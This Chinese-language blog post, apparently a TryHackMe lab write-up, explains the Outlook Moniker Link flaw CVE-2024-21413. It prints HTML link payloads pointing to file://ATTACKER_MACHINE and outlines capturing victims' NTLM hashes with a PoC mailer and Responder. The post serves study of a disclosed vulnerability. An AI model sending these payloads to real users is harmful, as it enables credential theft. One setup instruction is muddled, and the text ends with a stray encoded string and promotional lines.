Moniker-Link微软威胁分析:CVE-2024–21413
作者:#$ubh@nk@r
阅读时间:约3分钟
发布日期:2024年2月23日
简介:各位黑客朋友大家好!今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月13日公布。让我们深入了解其细节以及如何利用它。
此漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦用户点击该超链接,Outlook就会将用户的NTLMv2凭据发送给攻击者。
漏洞原理展示:
Outlook可以将电子邮件渲染为HTML。此外,Outlook能够解析诸如HTTP和HTTPS之类的超链接。然而,它也可以打开指向特定应用程序的URL,这些被称为Moniker Links。
通常,当触发外部应用程序时,Outlook会弹出安全警告。如果使用的是skypekeyword,那么警告会像这样显示。
这个弹窗是Outlook“受保护的视图”功能的结果。如果攻击者创建一个恶意超链接,同样会产生安全警报。
<p><ahref="file://ATTACKER_MACHINE/test">Click me</a></p>但是,这个警报可以通过使用一个特殊字符来绕过 →!
<p><ahref="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>利用过程:
要利用此漏洞,我们需要创建一个邮件服务器。你可以在TryHackMe实验室中尝试。
CMNatic帮助我们创建了一个Python脚本,用于通过SMTPServer自动化地向受害者发送邮件。
GitHub - CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab
CVE-2024-21413 PoC for THM Lab. 在GitHub上创建账户以贡献CMNatic/CVE-2024-21413的开发。
github.com
现在运行脚本。
注意:请在第31行将Attacker_IP和MAILSERVER_IP修改为受害者的IP地址。
邮件已送达。
现在启动你的Responder来捕获NTLM哈希。
打开受害者的Outlook收件箱。你可以看到邮件已经送达。现在,如果你点击“Click me”,由于那个特殊字符!的存在,将不会弹出安全警报。否则,它会显示警报。
如果你点击了该链接,你将会获得受害者的NTLM哈希。
总结:
以上就是该漏洞的利用方式。
感谢阅读!
如果你喜欢这篇文章,别忘了点赞并关注我,以获取更多文章。
祝黑客之旅愉快~
CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLQKZqtp5udwihyDPFTm5IRv37dlo2W+4VY3z1d0M7aWubJiUxybkI3nx55gCmDWobsitrjS0yiQJF3ZKoUJ66E
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
